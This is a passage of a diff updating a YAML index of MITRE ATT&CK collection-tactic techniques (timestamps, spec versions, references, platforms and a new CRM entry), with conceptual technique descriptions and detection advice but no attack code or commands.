         description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
           by Cyber Actors. Retrieved October 2, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-02-17T19:50:46.948Z'
       name: Network Device Configuration Dump
       description: "Adversaries may access network configuration files to collect
         sensitive data about the device and the network. The network configuration
@@ -40529,8 +41090,6 @@ collection:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1560:
     technique:
@@ -40584,7 +41143,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1560
     atomic_tests: []
   T1185:
@@ -40621,7 +41179,7 @@ collection:
         description: Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual.
           Retrieved May 24, 2017.
         source_name: cobaltstrike manual
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-02-25T18:58:15.229Z'
       name: Browser Session Hijacking
       description: |-
         Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)
@@ -40649,12 +41207,10 @@ collection:
       - Administrator
       - SYSTEM
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1557.003:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-09-12T19:46:04.759Z'
       name: DHCP Spoofing
       description: "Adversaries may redirect network traffic to adversary-owned systems
         by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -40691,23 +41247,23 @@ collection:
         phase_name: credential-access
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Alex Spivakovsky, Pentera
+      - Andrew Allen, @whitehat_zero
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
         involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
         monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
         specify that the IP allocations are low or have run out; these EIDs may indicate
         a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - Windows
       - macOS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
       x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Alex Spivakovsky, Pentera
-      - Andrew Allen, @whitehat_zero
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Application Log: Application Log Content'
@@ -40740,21 +41296,20 @@ collection:
       - source_name: solution_monitor_dhcp_scopes
         description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
           and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
-          March 7, 2022.'
-        url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+          September 12, 2024.'
+        url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
       - source_name: w32.tidserv.g
         description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
           14, 2022.
         url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1557.001:
     technique:
-      modified: '2023-04-25T14:00:00.188Z'
+      modified: '2022-10-25T15:46:55.393Z'
       name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
       description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
         spoof an authoritative source for name resolution to force communication with
@@ -40862,12 +41417,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1557.001
     atomic_tests: []
   T1056.003:
     technique:
-      modified: '2023-03-30T21:01:46.711Z'
+      modified: '2024-10-15T16:43:43.849Z'
       name: Web Portal Capture
       description: |-
         Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -40878,13 +41432,13 @@ collection:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: File monitoring may be used to detect changes to files in
         the Web directory for organization login pages that do not match with authorized
         updates to the Web server's content.
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
@@ -40898,6 +41452,7 @@ collection:
       id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
       created: '2020-02-11T18:59:50.058Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056/003
@@ -40908,12 +41463,12 @@ collection:
         url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1125:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.205Z'
       name: Video Capture
       description: |-
         An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.
@@ -40958,30 +41513,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
       identifier: T1125
     atomic_tests: []
   T1213.001:
     technique:
-      x_mitre_platforms:
-      - SaaS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
-      type: attack-pattern
-      created: '2020-02-14T13:09:51.004Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1213.001
-        url: https://attack.mitre.org/techniques/T1213/001
-      - url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
-        description: Atlassian. (2018, January 9). How to Enable User Access Logging.
-          Retrieved April 4, 2018.
-        source_name: Atlassian Confluence Logging
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-30T13:45:42.840Z'
       name: Confluence
       description: |2
 
@@ -40991,31 +41527,48 @@ collection:
         * Physical / logical network diagrams
         * System architecture diagrams
         * Technical system documentation
-        * Testing / development credentials
+        * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
         * Work / project schedules
         * Source code snippets
         * Links to network shares and other internal resources
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
 
         User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
+      created: '2020-02-14T13:09:51.004Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/001
+        external_id: T1213.001
+      - source_name: Atlassian Confluence Logging
+        description: Atlassian. (2018, January 9). How to Enable User Access Logging.
+          Retrieved April 4, 2018.
+        url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1114.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Email Collection: Email Forwarding Rule'
       description: "Adversaries may setup email forwarding rules to collect sensitive
         information. Adversaries may abuse email forwarding rules to monitor the activities
@@ -41048,10 +41601,12 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Security
       - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
       - Liran Ravich, CardinalOps
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)
@@ -41060,16 +41615,17 @@ collection:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - Windows
-      - Google Workspace
       - macOS
       - Linux
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
+      - 'Cloud Service: Cloud Service Metadata'
       type: attack-pattern
       id: attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0
       created: '2020-02-19T18:54:47.103Z'
@@ -41101,70 +41657,66 @@ collection:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1114.003
     atomic_tests: []
   T1074:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - IaaS
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      - Shane Tully, @securitygypsy
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
-      created: '2017-05-31T21:30:58.938Z'
-      x_mitre_version: '1.4'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1074
-        url: https://attack.mitre.org/techniques/T1074
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: PWC Cloud Hopper April 2017
-        url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
-        description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
-          April 5, 2017.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-09-30T13:28:37.415Z'
+      name: Data Staged
       description: |-
         Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)
 
         In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
 
         Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.
-      modified: '2022-11-08T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Data Staged
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Praetorian
+      - Shane Tully, @securitygypsy
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
 
         Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
 
         Consider monitoring accesses and modifications to storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: collection
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'File: File Creation'
       - 'Windows Registry: Windows Registry Key Modification'
       - 'Command: Command Execution'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
+      created: '2017-05-31T21:30:58.938Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1074
+        external_id: T1074
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: PWC Cloud Hopper April 2017
+        description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
+          April 5, 2017.
+        url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.002:
     technique:
@@ -41237,7 +41789,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.002
     atomic_tests: []
   T1039:
@@ -41292,12 +41843,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1039
     atomic_tests: []
   T1114.002:
     technique:
-      modified: '2023-05-31T12:34:03.420Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Email Collection: Remote Email Collection'
       description: Adversaries may target an Exchange server, Office 365, or Google
         Workspace to collect sensitive information. Adversaries may leverage a user's
@@ -41309,6 +41859,9 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor for unusual login activity from unknown or abnormal
         locations, especially for privileged accounts (ex: Exchange administrator
@@ -41316,11 +41869,11 @@ collection:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - Windows
-      - Google Workspace
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -41337,14 +41890,11 @@ collection:
         external_id: T1114.002
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1114.002
     atomic_tests: []
   T1056:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-08-13T17:33:45.244Z'
       name: Input Capture
       description: Adversaries may use methods of capturing user input to obtain credentials
         or collect information. During normal system usage, users often provide credentials
@@ -41360,6 +41910,7 @@ collection:
         phase_name: credential-access
       x_mitre_contributors:
       - John Lambert, Microsoft Threat Intelligence Center
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection may vary depending on how input is captured but
         may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
         `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -41368,13 +41919,13 @@ collection:
         keylogging or API hooking are present.'
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
       - Network
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -41382,15 +41933,11 @@ collection:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
       - 'Driver: Driver Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      - root
-      - User
       type: attack-pattern
       id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
       created: '2017-05-31T21:30:48.323Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056
@@ -41401,9 +41948,60 @@ collection:
         url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1213.004:
+    technique:
+      modified: '2024-10-17T14:36:24.983Z'
+      name: Customer Relationship Management Software
+      description: |-
+        Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is used to assist organizations in tracking and managing customer interactions, as well as storing customer data.
+
+        Once adversaries gain access to a victim organization, they may mine CRM software for customer data. This may include personally identifiable information (PII) such as full names, emails, phone numbers, and addresses, as well as additional details such as purchase histories and IT support interactions. By collecting this data, an adversary may be able to send personalized [Phishing](https://attack.mitre.org/techniques/T1566) emails, engage in SIM swapping, or otherwise target the organization’s customers in ways that enable financial gain or the compromise of additional organizations.(Citation: Bleeping Computer US Cellular Hack 2022)(Citation: Bleeping Computer Mint Mobile Hack 2021)(Citation: Bleeping Computer Bank Hack 2020)
+
+        CRM software may be hosted on-premises or in the cloud. Information stored in these solutions may vary based on the specific instance or environment. Examples of CRM software include Microsoft Dynamics 365, Salesforce, Zoho, Zendesk, and HubSpot.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Centre for Cybersecurity Belgium (CCB)
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Logon Session: Logon Session Creation'
+      - 'Application Log: Application Log Content'
+      type: attack-pattern
+      id: attack-pattern--bbfbb096-6561-4d7d-aa2c-a5ee8e44c696
+      created: '2024-07-01T20:06:13.664Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/004
+        external_id: T1213.004
+      - source_name: Bleeping Computer Bank Hack 2020
+        description: Ionut Ilascu. (2020, January 16). Customer-Owned Bank Informs
+          100k of Breach Exposing Account Balance, PII. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/customer-owned-bank-informs-100k-of-breach-exposing-account-balance-pii/
+      - source_name: Bleeping Computer Mint Mobile Hack 2021
+        description: Lawrence Abrams. (2021, July 10). Mint Mobile hit by a data breach
+          after numbers ported, data accessed. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/mint-mobile-hit-by-a-data-breach-after-numbers-ported-data-accessed/
+      - source_name: Bleeping Computer US Cellular Hack 2022
+        description: Sergiu Gatlan. (2022, January 4). UScellular discloses data breach
+          after billing system hack. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/uscellular-discloses-data-breach-after-billing-system-hack/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1557.002:
     technique:
@@ -41449,7 +42047,7 @@ collection:
         The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
 
         Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-22T18:37:22.176Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: ARP Cache Poisoning
       x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
@@ -41468,37 +42066,36 @@ collection:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1213.003:
     technique:
-      modified: '2022-10-18T22:44:01.723Z'
+      modified: '2024-09-04T13:03:54.101Z'
       name: Code Repositories
       description: |-
         Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.
 
-        Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code.  Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
+        Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or [Unsecured Credentials](https://attack.mitre.org/techniques/T1552) contained within software's source code.  Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
 
         **Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories.
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Itamar Mizrahi, Cymptom
+      - Toby Kohlenberg
+      - Josh Liburdi, @jshlbrd
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor access to code repositories, especially performed
         by privileged users such as Active Directory Domain or Enterprise Administrators
         as these types of accounts should generally not be used to access code repositories.
         In environments with high-maturity, it may be possible to leverage User-Behavioral
         Analytics (UBA) platforms to detect and alert on user-based anomalies.
-      x_mitre_platforms:
-      - SaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Itamar Mizrahi, Cymptom
-      - Toby Kohlenberg
-      - Josh Liburdi, @jshlbrd
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -41521,41 +42118,52 @@ collection:
         url: https://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1213:
     technique:
-      modified: '2024-03-01T16:27:47.391Z'
+      modified: '2024-10-28T19:10:16.960Z'
       name: Data from Information Repositories
       description: "Adversaries may leverage information repositories to mine valuable
         information. Information repositories are tools that allow for storage of
         information, typically to facilitate collaboration or information sharing
         between users, and can store a wide variety of data that may aid adversaries
-        in further objectives, or direct access to the target information. Adversaries
-        may also abuse external sharing features to share sensitive documents with
-        recipients outside of the organization. \n\nThe following is a brief list
-        of example information that may hold potential value to an adversary and may
-        also be found on an information repository:\n\n* Policies, procedures, and
-        standards\n* Physical / logical network diagrams\n* System architecture diagrams\n*
-        Technical system documentation\n* Testing / development credentials\n* Work
-        / project schedules\n* Source code snippets\n* Links to network shares and
-        other internal resources\n\nInformation stored in a repository may vary based
-        on the specific instance or environment. Specific common information repositories
-        include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002)
-        and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific
-        services such as Code Repositories, IaaS databases, enterprise databases,
-        and other storage infrastructure such as SQL Server."
+        in further objectives, such as Credential Access, Lateral Movement, or Defense
+        Evasion, or direct access to the target information. Adversaries may also
+        abuse external sharing features to share sensitive documents with recipients
+        outside of the organization (i.e., [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).
+        \n\nThe following is a brief list of example information that may hold potential
+        value to an adversary and may also be found on an information repository:\n\n*
+        Policies, procedures, and standards\n* Physical / logical network diagrams\n*
+        System architecture diagrams\n* Technical system documentation\n* Testing
+        / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
+        \n* Work / project schedules\n* Source code snippets\n* Links to network shares
+        and other internal resources\n* Contact or other sensitive information about
+        business partners and customers, including personally identifiable information
+        (PII) \n\nInformation stored in a repository may vary based on the specific
+        instance or environment. Specific common information repositories include
+        the following:\n\n* Storage services such as IaaS databases, enterprise databases,
+        and more specialized platforms such as customer relationship management (CRM)
+        databases \n* Collaboration platforms such as SharePoint, Confluence, and
+        code repositories\n* Messaging platforms such as Slack and Microsoft Teams
+        \n\nIn some cases, information repositories have been improperly secured,
+        typically by unintentionally allowing for overly-broad access by all users
+        or even public access to unauthenticated users. This is particularly common
